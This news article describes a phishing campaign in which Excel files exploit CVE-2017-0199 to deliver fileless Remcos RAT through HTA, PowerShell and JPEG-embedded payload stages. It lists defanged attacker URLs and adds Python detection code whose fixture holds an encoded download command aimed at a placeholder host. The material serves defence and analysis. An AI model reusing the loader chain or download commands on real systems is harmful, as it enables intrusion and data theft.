Beware Of Weaponized Excel Document That Delivers Fileless Remcos RAT


Remcos is a Remote Access Trojan (RAT) that allows attackers to gain unauthorized control over infected computers.

This RAT has been weaponized and commonly used in cybercriminal activities since its introduction in 2016.

Trellix researchers recently warned of weaponized Excel documents that were found delivering fileless Remcos RAT.

Weaponized Excel Document

In this new malware campaign, threat actors were found exploiting a critical vulnerability in Microsoft Office's and WordPad's handling of OLE objects, tracked as CVE-2017-0199.


The attack begins with a phishing email carrying an encrypted Excel file that appears to be protected, which entices the user to interact with it.

Excel document containing pixelated screenshot (Source – Trellix)

When the file is opened, it exploits CVE-2017-0199 to execute embedded OLE objects that download a malicious HTA file from a URL (hxxps://slug.vercel.app/wyiqkf).

This HTA file then runs PowerShell with base64-encoded parameters to retrieve a VBScript from “hxxp://45.90.89.50/100/instantflowercaseneedbeautygirlsherealways.gIF.”

Obfuscated data getting executed by PowerShell (Source – Trellix)

The VBScript contains obfuscated data that, when processed by PowerShell, spawns additional PowerShell processes.

These processes download a JPEG file (hxxp://servidorwindows.ddns.com.br/Files/vbs.jpeg) containing the final payload.

The attack then injects a fileless variant of the Remcos RAT into a legitimate Windows process, the report reads.
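The chain described above (Excel spawning a script host, PowerShell launched with a base64-encoded command, and a legitimate Windows process started under that script host) leaves a distinctive parent/child pattern in process-creation telemetry. The following is an added example, not code from Trellix or from the article, of how a defender can check such telemetry for that pattern. The events are constructed Sysmon-style records with a hypothetical `example.invalid` URL; the decoder relies on the fact that PowerShell's `-EncodedCommand` argument is base64 over UTF-16LE text.

```python
import base64
import re
from typing import Dict, Iterable, List

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}
# .NET utilities commonly used as injection targets; the article names RegAsm.exe.
NET_UTILITIES = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}

# PowerShell accepts -e, -ec, -enc or the full -EncodedCommand switch.
ENCODED_ARG = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
URL_PATTERN = re.compile(r"https?://[^\s'\"()]+")

# Constructed sample events (not real telemetry), modelled on the chain in the article.
_STAGE2_CMD = "Invoke-WebRequest -Uri 'http://example.invalid/stage2.txt'"
_ENCODED = base64.b64encode(_STAGE2_CMD.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": '"EXCEL.EXE" invoice.xlsx'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.invalid/stage1.hta"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + _ENCODED},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "cmdline": "RegAsm.exe"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand text, or '' if the switch is absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def ancestors(pid: int, by_pid: Dict[int, dict]) -> List[str]:
    """Image basenames of the parent, grandparent, ... of pid (cycle-safe)."""
    chain, seen = [], set()
    ev = by_pid.get(pid)
    while ev is not None and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        seen.add(ev["ppid"])
        ev = by_pid[ev["ppid"]]
        chain.append(basename(ev["image"]))
    return chain


def analyze(events: Iterable[dict]) -> List[dict]:
    """Apply three parent/child rules to process-creation events and return findings."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in by_pid.values():
        image = basename(e["image"])
        parents = ancestors(e["pid"], by_pid)
        # Rule 1: an Office application directly spawning a script host (the HTA stage).
        if image in SCRIPT_HOSTS and parents and parents[0] in OFFICE_APPS:
            findings.append({"pid": e["pid"], "rule": "office_spawns_script_host",
                             "detail": f"{parents[0]} -> {image}"})
        # Rule 2: encoded PowerShell; surface the decoded text and any URLs inside it.
        if image in {"powershell.exe", "pwsh.exe"}:
            decoded = decode_encoded_command(e["cmdline"])
            if decoded:
                findings.append({"pid": e["pid"], "rule": "encoded_powershell",
                                 "detail": decoded, "urls": URL_PATTERN.findall(decoded)})
        # Rule 3: a .NET utility started anywhere beneath a script host (injection target).
        if image in NET_UTILITIES and any(p in SCRIPT_HOSTS for p in parents):
            findings.append({"pid": e["pid"], "rule": "net_utility_under_script_host",
                             "detail": " <- ".join([image] + parents)})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["pid"], f["rule"], f["detail"])
```

Rule 3 is deliberately broad: RegAsm.exe is normally started by installers or developer tooling, so seeing it anywhere below mshta.exe or PowerShell is worth an alert even before memory is inspected. Decoding the `-EncodedCommand` argument at the detection layer means the staging URL ends up in the alert rather than only in a later forensic pass.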

In this campaign, the threat actors' strategies demonstrated sophisticated evasion tactics, and they primarily targeted the following sectors in Belgium, Japan, the USA, South Korea, Canada, Germany, and Australia:

  • Government
  • Manufacturing
  • IT
  • Banking

It’s part of a trend that includes similar attacks deploying malware like “RevengeRAT,” “SnakeKeylogger,” “GuLoader,” “AgentTesla,” and “FormBook.”

The multi-stage approach employs techniques such as T1221 (Template Injection) and T1059.001 (Visual Basic Scripting) to bypass security measures, highlighting the evolving complexity of cyber threats that leverage seemingly harmless documents to deliver powerful malware payloads.

The payload stage begins with a JPEG file containing an embedded base64-encoded ‘dnlib.dll’, an open-source .NET library for assembly manipulation.

This DLL is decoded and loaded directly into memory via System.Reflection.Assembly, a .NET class that enables runtime assembly operations.

PowerShell then downloads a text file with base64-encoded data from a malicious URL. This data is decoded and processed by the loaded dnlib.dll to generate an in-memory .NET assembly of Remcos RAT.
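A JPEG that carries a base64-encoded DLL is usually a valid-looking image with the encoded payload appended after the end-of-image marker, which is why it passes a casual content-type check. The following is an added triage example, not code from Trellix or the article: it carves the data after the last JPEG EOI marker, decodes any long base64 run found there, and checks whether the result is a PE file (a DOS `MZ` header whose `e_lfanew` field points at a `PE\0\0` signature). The sample carrier is a constructed JPEG stub with a constructed stand-in for a PE appended; it is not a real image or a real binary.

```python
import base64
import re
from typing import Dict, List

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
# A base64 run long enough to be worth decoding; short runs are usually noise.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def looks_like_pe(data: bytes) -> bool:
    """True if data has a DOS MZ header whose e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def build_fake_pe(size: int = 512) -> bytes:
    """Constructed stand-in for a PE image: MZ header, e_lfanew = 0x80, PE signature at 0x80.
    This is only enough to exercise looks_like_pe(); it is not an executable."""
    hdr = bytearray(size)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = (0x80).to_bytes(4, "little")
    hdr[0x80:0x84] = b"PE\x00\x00"
    return bytes(hdr)


def carve_jpeg_trailer(blob: bytes) -> Dict:
    """Inspect the bytes after the last EOI marker of a JPEG for base64-encoded PE content."""
    if not blob.startswith(JPEG_SOI):
        raise ValueError("not a JPEG (missing SOI marker)")
    eoi = blob.rfind(JPEG_EOI)
    if eoi == -1:
        raise ValueError("no EOI marker found")
    trailer = blob[eoi + 2:]
    # Base64 blobs are often line-wrapped; strip whitespace before looking for runs.
    compact = re.sub(rb"\s+", b"", trailer)
    candidates: List[Dict] = []
    for m in B64_RUN.finditer(compact):
        run = m.group(0)
        if b"=" not in run:
            run = run[: len(run) - len(run) % 4]  # drop a ragged tail so decoding can succeed
        try:
            decoded = base64.b64decode(run, validate=True)
        except ValueError:
            continue
        candidates.append({"run_len": len(run), "decoded_len": len(decoded),
                           "is_pe": looks_like_pe(decoded)})
    return {"trailer_len": len(trailer), "candidates": candidates,
            "embedded_pe": any(c["is_pe"] for c in candidates)}


# Constructed sample: a JPEG stub (SOI, one JFIF APP0 segment, EOI) with a base64-encoded
# fake PE appended after the EOI marker, mimicking the carrier described in the article.
_STUB_JPEG = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
              + b"\xff\xd9")
CLEAN_JPEG = _STUB_JPEG
SAMPLE_CARRIER = _STUB_JPEG + b"\n" + base64.b64encode(build_fake_pe())


if __name__ == "__main__":
    print(carve_jpeg_trailer(SAMPLE_CARRIER))
    print(carve_jpeg_trailer(CLEAN_JPEG))
```

Running `carve_jpeg_trailer` over image attachments and web-proxy downloads gives a cheap signal: a JPEG with a multi-kilobyte trailer that decodes to an `MZ`/`PE` image has no legitimate reason to exist. The same check generalises to other carriers (PNG after the IEND chunk, GIF after the trailer byte) by swapping the end-marker search.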

Strings related to Remcos found in RegAsm process memory (Source – Trellix)

The RAT is then injected into the legitimate Windows process ‘RegAsm.exe’ for execution, and this process leaves minimal traces of Remcos-associated behaviors.

Remcos establishes persistence through process injection that ensures continuous attacker access.

This sophisticated approach combines vulnerability exploitation, memory-only .NET assemblies, and advanced evasion techniques, illustrating the complexity of modern malware.
